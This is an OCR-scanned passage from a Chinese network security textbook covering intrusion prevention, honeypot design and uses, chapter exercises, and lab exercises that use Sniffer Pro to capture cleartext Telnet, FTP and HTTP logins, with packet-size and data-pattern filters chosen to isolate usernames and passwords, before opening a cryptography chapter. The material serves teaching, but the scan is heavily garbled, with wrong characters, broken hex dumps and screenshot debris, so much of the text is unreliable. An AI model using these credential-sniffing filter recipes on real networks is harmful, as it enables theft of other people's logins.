理 10 条 警报 信息 来 计算 ，IPS 每 小 时 至 少 需要 处 理 36000 条 警报 ， 一 天 就 是 864000 条 。 
一 旦 生成 了 警报 ， 最 基本 的 要 求 就 是 集中 式 IPS 能 够 对 警报 进行 有 效 处 理 。 如 果 入 侵 特 征 
编写 得 不 是 十 分 完善 ， 那 么 就 会 导致 误 报 ， 合 法 流量 有 可 能 被 意外 拦截 。 


5.3 富 钠 系统 


蜜 饶 好 比 是 情报 收集 系统 。 是 故意 让 人 攻击 的 目标 ， 引 诱 黑客 前 来 攻击 。 所 以 攻击 者 
入 侵 后 ， 你 就 可 以 知道 他 是 如 何 得 伯 的 ， 随 时 了 解 针 对 贵 公司 服务 器 发 动 的 最 新 的 攻击 和 
漏洞 。 还 可 以 通过 窃听 黑客 之 间 的 联系 ， 收 集 黑客 所 用 的 种 种 工具 ， 并 且 掌握 他 们 的 社交 
网 络 。 下 面 详细 地 介绍 蜜 灸 系统 。 


5.3.1 ” 寅 钠 概 述 


记录 黑客 的 活动 ， 让 黑客 来 告诉 我 们 所 面临 的 威胁 。 分 析 蜜 色 采 集 的 信息 ， 人 们 可 以 了 解 
黑客 攻击 的 方式 和 手段 ， 发 现 威胁 所 在 。 

蜜 钢 与 入 侵 检 测 系统 有 着 紧密 的 联系 。 要 完善 一 个 入 侵 检测 系统 , 需要 不 断 了 解 黑客 ， 
了 解 黑客 的 动向 、 新 的 攻击 方式 和 手段 。 蜜 镀 提 供 了 一 个 丰富 的 认识 黑客 攻击 手段 的 信 
息 源 。 

只 有 蜜 缸 表现 得 像 一 个 正常 的 工作 系统 ， 黑 客 才 会 对 其 进行 攻击 ; 只 有 蜜 缸 表现 得 盘 
真 ， 黑 客 才 会 在 蜜 缸 上 停留 较 长 的 时 间 ， 才 会 暴露 出 更 多 的 信息 。 初 期 的 蜜 缸 系统 采用 伪 
造 服务 技术 , 模仿 正常 服务 器 软件 的 一 些 基本 行为 吸引 黑客 攻击 ， 这 种 方式 虽然 成 本 较 底 ， 
但 却 很 容易 被 黑客 识破 ， 采 集 不 到 太 多 的 黑客 信息 。 

采用 真实 系统 作 蜜 缸 ， 能 提供 黑客 与 系统 的 交互 能 力 ， 伪 装 程度 明显 提高 。 但 如 果 暴 
露出 太 多 的 漏洞 ， 也 会 引起 黑客 的 怀疑 ， 全 打 补 丁 又 会 让 黑客 月 而 远 之 ， 应 适当 打 一 些 
补丁 。 
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除了 使 用 真实 的 系统 ， 还 需要 对 这 些 真实 系统 进行 配置 ， 否 则 ， 老 练 的 黑客 可 以 很 容 
易 地 识破 真 伪 。 最 为 逼真 的 配置 办 法 是 把 一 个 修改 过 敏感 信息 的 工作 系统 内 容 直接 复制 到 
蜜 链 上 ， 用 虚假 的 信息 替换 掉 真 实 的 用 户 信息 和 文档 ， 但 这 需要 对 系统 非常 熟悉 。 

更 为 高 级 的 蜜 缸 系统 不 是 仅 使 用 一 台 孤 立 的 系统 ， 而 是 设置 一 个 包含 多 台 密 缸 机 的 网 
络 环境 ， 蜜 钠 系 统 的 伪装 程度 得 到 进一步 提高 。 用 系统 设施 ， 也 可 利用 已 有 的 数据 采集 手 
段 ， 还 可 以 开发 专门 的 采集 方法 。 黑 客 通过 网 络 与 蜜 镀 交互 ， 进 出 蜜 缸 机 的 数据 包 都 要 记 
录 下 来 ， 一 般 是 利用 网 络 sniffer 或 IDS 记录 网 络 数据 包 ， 防 火 墙 的 连接 记录 也 是 很 有 帮助 
的 信息 。 

蜜 饶 系 统 可 以 利用 远程 日 志 服务 器 记录 系统 日 志 信息 ， 但 黑客 侵入 系统 后 ， 往 往 要 破 
坏 掉 系 统 日 志 。 因 此 需要 使 用 非常 规 的 数据 采集 方法 记录 黑客 在 蜜 缸 内 的 活动 ， 例 如 使 用 
更 改 的 shell 程序 记录 黑客 的 键 击 ， 或 开发 专门 的 内 核 模 块 采集 键 击 信息 。 在 蜜 缸 上 采集 到 
的 信息 一 般 还 需要 传递 到 远 地 保 存 。 由 于 受 隐 蔽 性 限制 ， 蜜 钠 系 统 采集 信 息 的 手段 并 不 是 
很 丰富 ， 在 信息 采集 的 完整 性 方面 还 有 很 大 潜力 可 挖 。 


5.3.2 ” 蜜 负 的 分 类 


世界 上 不 会 有 非常 全 面 的 事物 ， 蜜 饶 也 一 样 。 根 据 管理 员 的 需要 ， 蜜 饶 的 系统 和 漏洞 
设置 要 求 也 不 尽 相同 ， 蜜 钠 是 有 针对 性 的 ， 而 不 是 盲目 设置 的 ， 因 此 ， 就 产生 了 多 种 多 样 


1. 实 系统 宣 色 

实 系统 蜜 饶 是 最 真实 的 蜜 链 ， 它 运行 着 真实 的 系统 ， 并 且 带 着 真实 可 入 侵 的 漏洞 ， 属 
于 最 危险 的 漏洞 ， 但 是 它 记 录 下 的 入 侵 信息 往往 是 最 真实 的 。 这 种 蜜 钠 安 装 的 系统 一 般 都 
是 最 初 的 ， 没 有 任何 SP 补丁 ,或 者 打 了 低 版 本 SP 补丁 ， 根 据 管理 员 需 要 ， 也 可 能 补 上 一 
些 漏 洞 ， 只 要 值得 研究 的 漏洞 还 存在 就 必须 打 补 丁 。 然 后 把 蜜 色 连接 到 网 络 上 ， 根 据 目 前 
的 网 络 扫描 频繁 来 看 ， 这 样 的 蜜 镀 很 快 就 能 吸引 到 目标 并 接受 攻击 ， 系 统 运行 的 记录 程序 
会 记 下 入 侵 者 的 一 举 一 动 ， 但 同时 它 也 是 最 危险 的 ， 因 为 入 侵 者 每 一 个 入 侵 都 会 引起 系统 
真实 的 反应 ， 例 如 被 溢出 、 渗 透 和 夺取 权限 等 。 

2. 伪 系 统 写 色 


伪 系 统 蜜 饶 也 是 建立 在 真实 系统 基础 上 的 ， 但 是 它 最 大 的 特点 就 是 “平台 与 漏洞 非 对 
称 性 ”。 

大 家 知道 ， 操 作 系统 不 只 有 Windows, 在 这 个 领域 , 还 有 Linux、UNIX、OS2 和 BeOS 
等 ， 它 们 的 核心 不 同 ， 因 此 会 产生 的 漏洞 和 缺陷 也 就 不 尽 相 同 ， 也 就 是 很 少 有 能 同时 攻击 
儿 种 系统 的 漏洞 代码 ， 也 许 用 LSASS 溢出 漏洞 能 拿 到 Windows 的 权限 ， 但 是 用 同样 的 手 
法 去 溢出 Linux 只 能 是 徒劳 的 。 根 据 这 种 特性 ， 能 产生 “ 伪 系 统 蜜 缸 ”， 它 利用 一 些 工 具 
程序 强大 的 模仿 能 力 ， 伪 造 出 不 属于 自己 平台 的 “漏洞 ”， 入 侵 这 样 的 “漏洞 ”， 只 能 是 
在 一 个 程序 框架 里 打转 ， 即 使 成 功 “ 渗 透 ”， 也 仍然 是 程序 制造 的 梦境 一 一 系统 本 来 就 没 
有 让 这 种 漏洞 成 立 的 条 件 。 实 现 一 个 “ 伪 系 统 ” 并 不 困难 ，Windows 平台 下 的 一 些 虚拟 机 
程序 、Linux 自身 的 脚本 功能 加 上 第 三 方 工具 就 能 轻松 实现 ， 甚 至 在 Linux/UNIX 下 还 能 


实时 由 管理 员 产生 一 些 根本 不 存在 的 “漏洞 ”， 让 入 侵 者 自 以 为 得 运 。 实 现 跟踪 记录 也 很 
容易 ， 只 要 在 后 台 开 着 相应 的 记录 程序 即 可 。 

这 种 蜜 色 的 好 处 在 于 ， 能 最 大 限度 防止 被 入 侵 者 破坏 ， 也 能 模拟 不 存在 的 漏洞 ， 甚 至 
可 以 让 一 些 Windows 蠕虫 攻击 Linux， 只 要 模拟 出 符合 条 件 的 Windows 特征 即 可 。 但 是 
也 存在 坏处 ， 因 为 一 个 聪明 的 入 侵 者 只 要 经 过 几 个 回合 就 会 识破 伪装 ， 另 外 ， 编 写 脚本 并 
不 是 一 件 简单 的 事情 。 


5.3.3 ” 蜜 镀 的 应 用 


既然 蜜 缸 不 是 做 来 玩 的 ， 管 理 员 自然 就 不 会 做 个 蜜 饶 然 后 让 它 赋 闲 在 家 ， 屠 么 到 底 怎 
么 用 蜜 饶 呢 ? 

1. 迷惑 入 侵 者 ， 保 护 服务 器 

一 般 的 客户 机 /服务 器 模式 里 ， 浏 览 者 是 直接 与 网 站 服务 器 连接 的 ， 换 多 话说， 整个 网 
站 服务 器 都 暴露 在 入 侵 者 面前 ， 如 果 服 务 器 安全 措施 不 够 ， 那 么 整个 网 站 数据 都 有 可 能 被 
入 侵 者 轻易 毁灭 。 但 是 如 果 在 客户 机 /服务 器 模式 里 嵌入 蜜 缸 ， 让 蜜 饶 作 为 服务 器 角色 ， 真 
正 的 网 站 服务 器 作为 一 个 内 部 网 络 在 蜜 缸 上 做 网 络 端口 映射 ， 这 样 可 以 把 网 站 的 安全 系数 
提高 ， 入 侵 者 即使 渗透 了 位 于 外 部 的 “服务 器 ”， 也 得 不 到 任何 有 价值 的 资料 ， 因为 他 入 
侵 的 是 蜜 镀 而 已 。 虽 然 入 侵 者 可 以 在 蜜 饶 的 基础 上 跳 进 内 部 网 络 ， 但 那 要 比 直接 攻 下 一 台 
外 部 服务 器 复杂 得 多 ， 许 多 水 平 不 足 的 入 侵 者 只 能 望而却步 。 

在 这 种 用 途上 ， 蜜 钠 不 能 设计 得 漏洞 百出 。 蜜 钢 既 然 成 了 内 部 服务 器 的 保护 层 ， 就 必 
须要 求 它 自身 足够 坚固 ， 和 否则 ， 整 个 网 站 都 要 拱手 送 人 了 。 

2. 抵御 入 侵 者 ， 加 固 服务 器 

入 侵 与 防范 一 直 都 是 热点 问题 ， 而 在 其 间 插入 一 个 蜜 负 系统 将 会 使 防范 变 得 有 趣 ， 蜜 
饶 可 被 设置 得 与 内 部 网 络 服务 器 一 样 ， 当 一 个 入 侵 者 费 尽 力气 入 侵 了 这 台 蜜 缸 的 时 候 ， 管 
理 员 已 经 收集 到 足够 的 攻击 数据 来 加 固 真实 的 服务 器 。 

采用 这 个 策略 去 布置 蜜 缸 ， 需 要 管理 员 配 合 监视 ， 否 则 入 侵 者 攻破 了 第 一 台 计 算 机 ， 
就 会 有 第 二 台 计 算 机 受到 攻击 。 

3. 诱捕 网 络 罪犯 

这 是 一 个 相当 有 趣 的 应 用 ， 当 管理 员 发 现 一 个 普通 的 客户 机 /服务 器 模式 网 站 服务 器 已 
经 牺牲 成 肉鸡 的 时 候 ， 管 理 员 会 迅速 修复 服务 器 。 那 么 下 次 呢 ?既然 入 侵 者 已 经 确信 自己 把 
该 服务 器 做 成 了 肉鸡 ， 他 必然 还 会 再 次 “光临 ”， 可 以 设置 一 个 蜜 缸 模拟 出 已 经 被 入 侵 的 
状态 ， 等 待 黑客 的 到 来 。 同 样 ， 一 些 企业 为 了 查找 恶意 入 侵 者 ， 也 会 故意 设置 一 些 有 不 明 
显 漏洞 的 蜜 捞 ， 让 入 侵 者 在 不 起 疑心 的 情况 下 乖乖 被 记录 下 一 切 行动 证 据 ， 有 些 人 把 此 戏 
称 为 “监狱 机 ”， 通 过 与 电信 局 的 配合 ， 可 以 轻易 揪 出 下 源头 的 那 双 黑 手 。 

随 着 网 络 入 侵 类 型 的 多 样 化 发 展 ， 蜜 缸 也 必须 进行 多 样 化 的 演绎 ， 否 则 总 有 一 天 它 将 
无 法 面 对 入 侵 者 的 肆虐 。 这 也 对 网 络 管理 员 的 技术 能 力 有 了 更 高 的 要 求 ， 因 为 蜜 缸 是 活跃 
在 安全 领域 的 虚拟 演员 ， 它 的 一 举 一 动 ， 都 是 通过 用 户 自己 来 设计 的 。 
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小 结 
本 章 主要 介绍 了 网 络 嗅 探 软 件 Sniffer Pro 原理 及 主要 的 使 用 方法 ， 网 络 入 侵 和 防护 系 


统 的 概念 ， 简 单 介绍 了 蜜 缸 系统 的 原理 ， 学 习 完 本 章 后 应 该 能 熟练 地 使 用 Sniffer 检测 出 不 
正常 的 网 络 流量 ， 搭 建 适合 自己 的 网 络 防护 系统 。 


本 章 习 题 


一 、 选 择 题 
1. 入 侵 检 测 系统 的 第 一 步 是 ( )。 
A. 信号 分 析 B 
C. 数据 包 过 滤 D. 数据 包 检 查 
2. ”入侵 检测 系统 在 进行 信号 分 析 时 ， 一 般 通 过 三 种 常用 的 技术 手段 ， 不 属于 通常 的 
三 种 技术 手段 的 是 ( )。 


A. 模式 匹配 B. 统计 分 析 
C. 完整 性 分 析 D. 密 文 分 析 
3. 入 侵 检 测 系统 所 通常 采用 的 是 ( % 
A. 基于 网 络 的 入 侵 检 测 B. 基于 了 PP 的 入 侵 检 测 
C. 基于 服务 的 入 侵 检 测 D. 基于 域名 的 入 侵 检 测 
4. 不 属于 入 侵 检测 系统 的 功能 是 ( 六 
A. 监视 网 络 上 的 通信 数据 流 B. 捕捉 可 疑 的 网 络 活动 
C. 提供 安全 审计 报告 D. 过 滤 非 法 的 数据 包 
二 、 填 空 题 
1. 入 侵 检 测 系统 主要 包括 三 部 分 : 和 
2. ”IPS 的 种 类 是 和 
三 、 简 答题 


1. 入 侵 检测 系统 可 以 分 为 哪 几 类 ? 

2. 试 述 入 侵 检测 系统 的 组 成 ， 并 画 出 其 工作 流程 图 。 
3. 入侵 检测 模型 的 类 型 ? 

4. 入 侵 检 测 系 统 (IDS) 的 主要 功能 ? 


不 
提 
立 
人 
材 
计 
算 
机 
系 
列 


实 训 一 ”捕获 telnet 数据 包 


通过 实验 掌握 数据 包 捕 捉 和 分 析 工具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
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击 过 程 及 其 网 络 系统 的 影响 。 
2. 实 训 环 境 
台 或 多 台 运 行 Windows XP 系统 计算 机 ， 通 过 集线器 相连 。 
3. 实 训 要 求 


1) ”安装 Sniffer Pro 

使 用 Sniffer 捕 提 数据 包 : 使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 ,并 捕捉 一 
定数 量 的 耳 、TCP 及 ICMP 数据 包 ， 掌 握 利用 工具 软件 观察 网 络 通信 流量 及 数据 包 捕 捉 
郁 法 。 

2) ”分 析 捕 获 的 数据 包 

对 上 面 所 捕获 的 数据 包 进行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 
装 格 式 。 

按 步 又 完成 试验 任务 ， 撰 写 试验 报告 。 

利用 两 台 主 机 进行 试验 ， 一 台 主 机 进行 Telnet 登录 ， 另 一 台 主 机 进行 Sniffer 数据 包 的 
捕捉 ， 把 捕捉 到 的 信息 写 出 来 ， 尤 其 是 用 户 名 和 密码 。 

4. 实 训 步骤 

1)” 抓 某 台 机 器 的 所 有 数据 包 

如 图 5-22 所 示 ,， 本 例 要 抓 192.168.113.208 这 台 机 器 的 所 有 数据 包 , 如 图 中 加 选择 这 人 台 
机 器 。 点 击 @ 所 指 图 标 ， 出 现 如 图 5-23 所 示 的 界面 ， 等 到 图 5-23 中 箭头 所 指 的 望远镜 图 
标 变 红 时 ,表示 已 捕捉 到 数据 ,点 击 该 图 标 出 现 如 图 5-24 所 示 界 面 , 选 择 箭头 所 指 的 Decode 
选项 即 可 看 到 捕捉 到 的 所 有 包 。 


和 == | | 
| sl) Klown | 人 
咏 | 回 | | sm Slelalelnlalalal 2| 全 
加 


3 88 3 io 
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1 183 70.633 
33 168 113 409] 
2 312 1 | 站 23 


12 
23 .30 人] 
489.790.691 


5-24 ”数据 包 解码 
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2)” 抓 Telnet 密码 

本 例 从 192.168.113.208 这 台 机 器 telnet 到 192.168.113.50， 用 Sniff Pro 抓 到 用 户 名 和 
密码 。 

步骤 1: 设置 规则 。 

如 图 5-25 所 示 ， 选 择 Capture 菜单 中 的 Defind Filter， 出 现 如 图 5-26 所 示 的 界面 ， 选 
择 图 5-26 中 的 Address 项 , 在 stationl 和 2 中 分 别 填写 两 台 机 器 的 了 P 地 址 ， 如 图 5-27 所 示 
选择 Advanced 选 项 ,选择 选 IP/TCP/Telnet ,将 Packet Size 设置 为 Equal 55，Packet Type 设 


置 为 Normal。 
Ta 了 3 
Samary Maress |Dats Pattern | Mvaneed | after| Solinos For 
Mdress 区 em Mdress: Dragable) 
oe | -i Miress 
G6 clude Muress hook 
es 
‘Capture Display Iools D Ca 
Start Fl0 
Stop Fn 
Stop and Display, Fo 
万 
Capture Panel 


图 5-25 ”定义 过 滤器 图 5-26 ”定义 搜索 地 址 


Packet Type 
[Normsl <| 
IDDcac Error 
Dysbber 到 


取消 | Profiles. .| 
图 5-27 限定 抓 包 的 协议 


步骤 2: 抓 包 。 

按 F10 键 出 现 图 5-28 界面 ， 开 始 抓 包 。 

步骤 3: 运行 telnet 命令 。 

本 例 使 telnet 到 一 台 开 有 telnet 服务 的 Linux 机 器 上 。 
telnet 192.168.113.50 

login: test 


说 洲 若 粹 于 ”十 江 从 穷 上 作 巴 漳 巴 


Password: 


TT EEE 


5-28 ”开始 抓 包 


步骤 4: 察看 结果 。 
图 5-29 中 第 头 所 指 的 望远镜 图 标 变 红 时 ,表示 已 捕捉 到 数据 , 点 击 该 图 标 出 现 如 图 5-30 
所 示 的 界面 , 选择 箭头 所 指 的 Decode 选项 即 可 看 到 捕捉 到 的 所 有 包 。 可 以 清楚 地 看 出 用 户 
名 为 test 密码 为 123456。 
Ele Monitor Capture Display Tools Database Window Help 


[ll Kr 可 | 


司 避 全 机 Ql 人 ol 到 |Slela| 为 | @| @| 
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曙 岂 DIC: Ethertype*0800. size*60 bytes 

mT IP: DT192.168.113.50] S*[192.168.113.208] LEN*21 1D*24583 
TCP; De23 S*2060 ACK=859603127 SED*3488832343 LEN*1 VIN=17412 
Telnet: C PORT*2060 ¢ 
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5-30” 抓 包 数 据 分 析 1 


解释 : 

虽然 把 密码 抓 到 了 ， 但 大 家 也 许 对 包 大 小 (Packet Size) 设 为 55 不 理解 ， 网 上 的 数据 传 
送 是 把 数据 分 成 若干 个 包 来 传送 ， 根 据 协 议 的 不 同 ， 包 的 大 小 也 不 相同 ， 从 图 5-31 中 可 以 
看 出 当 客 户 端 telnet 到 服务 端 时 一 次 只 传送 一 个 字 节 的 数据 ， 由 于 协议 的 头 长 度 是 一 定 的 ， 
telnet 的 数据 包 大 小 =DLC(14 字 节 )+IP(20 字 节 )+TCP(20 字 节 )+ 数 据 ( 一 个 字 节 )=55 字 

， 这 样 将 Packet Size 设 为 55 正好 能 抓 到 用 户 名 和 密码 ， 和 否则 将 抓 到 许多 不 相关 的 包 。 


© 
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济 洲 沼 拟 千 ” 寺 溢 芭 侣 睹 负 到 并 卫 


DIC: Ethertype=0800. size=60 bytes 
上 D=[192.168.113.50] S=(192.168.113.208] LEN=21 ID=24583 
TCP: D*23 S2060 ACK*859603127 SEQ*3488832343 LEN*1 VIN*17412 


Telnet: Telnet 一 -一 
Telnet 
Telnet: + 
Telnet 
00 50 ba 19 58 d0 00 02 le £8 31 72 08 00 45 00 和 
0000010: 00 23 60 07 40 00 80 06 00 00 c0 a8 71 d0 c0 a8 0 汪 扩 1 


0000020: 71 32 08 Qc 00 17 cf £3 Sb 57 33 3c 80 b7 50 18 让 Ft 
44 04 64 6£ 00 00 WW 00 00 00 00 00 


5-31 抓 包 数据 分 析 2 


实 训 二 ”捕获 ftp 数据 包 


1. 实 训 目 的 


通过 实验 掌握 数据 包 捕捉 和 分 析 工 具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
击 过 程 及 其 网 络 系统 的 影响 。 


2. 实 训 环境 
台 或 Windows XP 系统 计算 机 ， 通 过 集线器 相连 。 
3. 实 训 要 求 


1) ”安装 Sniffer Pro 

使 用 Sniffer 捕捉 数据 包 : 使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 ,并 捕捉 一 
定数 量 的 耳 、TCP 及 ICMP 数据 包 ， 掌 握 利用 工具 软件 观察 网 络 通 信 流 量 及 数据 包 捕 捉 
六 法 

2) “分 析 捕 获 的 数据 包 

对 上 面 所 捕获 的 数据 包 进 行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 
装 格式 。 

按 步 又 完成 试验 任务 ， 撰 写 试验 报告 。 

利用 两 台 主机 进行 试验 ， 一 台 主 机 进行 fp 登录 ， 另 一 台 主机 进行 Sniffer 数据 包 的 捕 
捉 ， 把 捕捉 到 的 信息 写 出 来 。 

4. 实 训 步 又 

步骤 1: 设置 规则 。 

如 图 5-25 所 示 ， 选 择 Capture 菜单 中 的 Defind Filter 出 现 如 图 5-32 所 示 的 界面 ， 选 择 
图 5-32 中 的 Address 项 ， 在 stationl 和 2 中 分 别 填写 两 台 机 器 的 IP 地 址 ， 选 择 Advanced 
选项 ， 选 择 IP/TCP/FTP, 将 Packet Size 设置 为 mm Between 63-71，Packet Type 设置 为 
Normal。 如 图 5-33 所 示 ， 选 择 Data Pattem 项 ， 点 击 箭头 所 指 的 Add Patterm 按钮 ， 出 现 如 
图 5-34 界面 ， 按 图 设置 Offset 为 2F， 在 方 格 内 填 入 18，name 可 任意 起 。 确 定 后 显示 如 图 


川 几 1 


5-35 所 示 的 界面 ， 点 击 Add NOT 按钮 ,再 点 击 Add Pattern 按钮 增加 第 二 条 规则 ， 如 图 
5-36 所 示 设 置 好 规则 ， 确 定 后 界面 如 图 5-37 所 示 。 


图 5-33 ”添加 数据 面板 


Edit Pattern 


Fa 本 alex HH 区 
Ey le 


图 5-34 添加 发 送 数据 包 1 
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图 5-37 ”添加 面板 
步骤 2: 抓 包 。 
按 F10 键 出 现 如 图 5-26 所 示 的 界面 ， 开 始 抓 包 。 
步骤 3: 运行 FTP 命令 。 
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本 例 使 FTP 到 一 台 开 有 FTP 服务 的 Linux 机 器 上 
D:/>ftp 192.168.113.50 
Connected to 192.168.113.50. 
220 testl FTP server (Version wu-2.6.1(1) Wed Aug 9 05:54:50 EDT 2000) ready. 
User (192.168.113.50:(none)): test 
331 Password required for test. 
Password: 
步骤 4: 查看 结果 。 
前 面 图 5-29 中 箭头 所 指 的 望远镜 图 标 变 红 时 ， 表 示 已 捕捉 到 数据 ， 点 击 该 图 标 出 现 如 
图 5-38 所 示 的 界面 ， 选 择 箭头 所 指 的 Decode 选项 即 可 看 到 捕捉 到 的 所 有 包 。 可 以 清楚 地 
看 出 用 户 名 为 test 密码 为 123456789。 


鲜 DIC: Ethertype*0900, size*70 bytes 
由 和 3P: D*[192 .168,113.50] S=-[192.168.113.208] LEN=36 ID*9762 
人 D*21 S*1949 ACK=3963455923 SEQ*=380460806 LEN*=16 VIN=17408 


00 50 ba 19 $8 d0 00 02 ie £8 31 72 08 00 45 00 .P?X?. ?x 
00 38 26 22 40 00 80 2 | | 71 dg c0 a8 .8&"@.1 gt 
00000020: 71 32 07 39d 00 15 16 ec 3d 89 b3 50 13 2 


L ? 
00000030; 44 00 64 3 00 00 EO 本 53 53 20 31 32 33 34 wi i es 12345 
00000040 S603maensmoands 


图 5-38 ”数据 抓 包 结果 分 析 

解释 : 
虽然 把 密码 抓 到 了 ， 但 大 家 也 许 还 不 理解 ， 将 图 5-30 中 Packet Size 设置 为 63 -71 是 
根据 用 户 名 和 口令 的 包 大 小 来 设置 的 ， 从 图 5-38 中 可 以 看 出 口令 的 数据 包 长 度 为 70 字 节 ， 
其 中 协议 头 长 度 为 ，14+20+20=54， 与 telnet 的 头 长 度 相同 。Ftp 的 数据 长 度 为 6， 其 中 关 
键 字 PASS 占 4 个 字 节 、 空 格 占 1 个 字 节 ， 密 码 占 9 个 字 节 。Od 0a( 回 车 换行 ) 占 2 个 字 节 ， 
包 长 度 =54+16=70。 如 果 用 户 名 和 密码 比较 长 那么 Packet Size 的 值 也 要 相应 的 增长 。 

Data Pattern 中 的 设置 是 根据 用 户 名 和 密码 中 包 的 特有 规则 设 定 的 ， 为 了 更 好 地 说 明 这 
个 问题 ， 请 在 开 着 图 5-38 的 情况 下 选择 Capture 菜单 中 的 Defind Filter， 如 图 5-33 所 示 ， 
选择 Data Pattem 项 ， 点 击 箭头 所 指 的 Add Pattern 按钮 ， 出 现 如 图 5-39 所 示 界 面 ， 选 择 图 
中 1 所 指 的 下, 然后 点 击 2 所 指 的 Set Data 按钮 。 OFFset、 方 格 内 、Name 将 填 上 相应 的 值 。 

同 理 图 5-40 中 也 是 如 此 。 

这 些 规则 的 设置 都 是 根据 你 要 抓 的 包 的 相应 特征 来 设置 的 , 这 些 都 需要 对 TCP/IP 协议 
的 深入 了 解 ， 从 图 5-41 中 可 以 看 出 网 上 传输 的 都 是 一 位 一 位 的 比特 流 ， 操 作 系统 将 比特 流 
转换 为 二 进 制 ，Sniffer 这 类 的 软件 又 把 二 进 制 换算 为 16 进 制 , 然后 又 为 这 些 数 赋予 相应 的 
意思 ， 图 中 的 18 指 的 是 TCP 协议 中 的 标志 位 是 18; OFFset 指 的 是 数据 包 中 某 位 数据 的 位 
置 ， 方 格 内 填 的 是 值 。 
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图 5-41 数据 包 分 析 


实 训 三 ”捕获 http 数据 包 


1. 实 训 目的 


通过 实验 掌握 数据 包 捕捉 和 分 析 工 具 的 使 用 ， 以 便 能 在 实验 中 利用 Sniffer 工具 观察 攻 
击 过 程 及 其 网 络 系统 的 影响 。 


2. 实 训 环境 
两 台 或 多 台 运行 Windows XP 系统 的 计算 机 ， 通 过 集线器 相连 。 
3. 实 训 要 求 : 


1) ”安装 Sniffer Pro 

使 用 Sniffer 捕捉 数据 包 : 使 用 Sniffer Pro 对 计算 机 间 的 通信 情况 进行 观察 ,并 捕捉 一 
定数 量 的 了 P、TCP 及 ICMP 数据 包 ， 掌 握 利 用 工具 软件 观察 网 络 通信 流量 及 数据 包 捕 捉 
方法 。 

2) ”分 析 捕 获 的 数据 包 

对 上 面 所 捕获 的 数据 包 进行 分 析 , 理解 TCP/IP 协议 栈 中 主要 协议 数据 的 数据 结构 和 封 
装 格 式 。 

按 步 又 完成 试验 任务 ， 撰 写 试验 报告 。 

利用 两 台 主 机 进行 试验 ， 一 台 主 机 进行 http 网 页 请 求 ， 另 一 台 主机 进行 Sniffer 数据 包 
的 捕 提 ， 把 捕捉 到 的 信息 写 出 来 。 

4. 实 训 步 又 

步骤 1: 设置 规则 。 

按照 如 图 5-42 和 图 5-43 所 示 ， 进 行 设置 规则 ， 设 置 方法 同上 。 


Define Filter 


Summary | Address | Data Pattern Advanced |Buffer | 


取消 | Prefiles | 


图 5-42 定义 抓 HTTP 数据 包 
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步骤 2: 抓 包 。 

按 F10 键 开 始 抓 包 。 

步骤 3: 访问 www.ccidnetcom 网 站 。 

步骤 4: 查看 结果 。 

图 5-29 中 箭头 所 指 的 望远镜 图 标 变 红 时 , 表示 已 捕捉 到 数据 ,点 击 该 图 标 出 现 如 图 5-44 
所 示 的 界面 ， 选 择 箭头 所 指 的 Decode 选项 即 可 看 到 捕捉 到 的 所 有 包 。 在 Summary 中 找到 
含有 POST 关键 字 的 包 ， 可 以 清楚 地 看 出 用 户 名 为 qiangkn997， 密 码 为 ?。 


Sbytes 
际 43 pet202 T0252 140] S192 1S 113 208] LEN*421 1D"22523 


Tort*3126 POST ve /163/ login_ pro cg HTTP/L 1 
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第 6 章 ”加密 技术 与 虚拟 专用 网 


【本 章 要 点 】 

本 章 主要 介绍 加 密 技术 的 基本 知识 和 虚拟 专用 网 的 相关 知识 。 希 望 读者 通过 本 章 的 学 
习 ， 能 够 掌握 加 密 技术 中 常用 的 几 种 算法 的 实践 和 理论 知识 。 对 信息 时 代 的 电子 商务 加 密 
技术 有 全 面 的 认识 和 掌握 。 


6.1 加 密 技 术 


密码 学 是 一 门 古老 的 学 科 , 在 古代 就 已 经 得 到 应 用 , 但 仅 限于 外 交 和 军事 等 重要 领域 。 
近年 来 ， 随 着 信息 技术 突飞猛进 的 发 展 和 计算 机 技术 的 广泛 应 用 ， 计 算 机 通信 网 络 得 到 长 
足 的 发 展 , 密码 技术 正在 不 断 向 更 多 其 他 领域 渗透 。 特别 是 随 着 Intemet 用 户 的 激增 , 世界 
正 步 入 网 络 经 济 的 新 时 代 。 对 更 有 效 的 生产 和 产品 销售 渠道 的 需求 ， 引 发 了 人 们 对 高 技术 
生产 力 的 要 求 ， 由 此 产生 了 一 批 具 有 代表 性 的 网 络 经 济 模式 ， 如 电子 商务 (Electronic 
Commerce)、 电 子 现金 (ElectronicCash)、 数 字 货 币 (DigitalCash)、 网 络 银行 (NetworkBank) 等 。 
有 专家 预言 ， 到 2010 年 , 发 生 在 Intemet 上 的 贸易 金额 将 会 达到 100000 亿美 元 。 伴 随 这 种 
高 增长 的 ， 就 是 对 网 络 经 济 的 安全 需求 。 

在 信息 时 代 ， 如 何 保护 我 们 的 数据 ， 防 止 被 一 些 怀 有 不 良 用 心 的 人 看 到 或 破坏 是 一 个 
严肃 的 问题 。 在 客观 上 我 们 需要 一 种 强 有 力 的 安全 措施 来 保护 机 密 数据 不 被 窃取 和 自 改 。 
解决 这 种 问题 的 方式 就 是 数据 加 密 。 加 密 技 术 是 电子 商务 采取 的 主要 安全 保密 措施 ， 是 最 
常用 的 安全 保密 手段 ， 它 利用 密码 技术 把 重要 的 数据 变 为 乱码 (加 密 ) 传 送 ， 到 达 目 的 地 后 
再 用 相同 或 不 同 的 手段 还 原 ( 解 密 )。 加 密 技术 包括 两 个 元 素 : 算法 和 密 钥 。 算 法 是 加 密 和 
解密 变换 的 规则 (数学 函数 )， 是 将 普通 的 文本 (可 以 理解 的 信息 ) 与 一 串 数 字 ( 密 钥 ) 的 结合 ， 
产生 不 可 理解 的 密 文 步骤 。 密 钥 (Key) 是 用 来 对 数据 进行 编码 和 解码 的 一 种 算法 ， 是 加 密 和 
解密 时 所 使 用 的 一 种 专门 信息 (工具 )。 

什么 是 密码 技术 呢 ? 密码 技术 是 保障 信息 安全 的 核心 技术 ， 是 保证 计算 机 网 络 安全 的 
理论 基础 。 是 结合 数学 、 计 算 机 科学 、 电 子 与 通信 等 诸多 学 科 于 一 身 的 交叉 学 科 。 它 的 主 
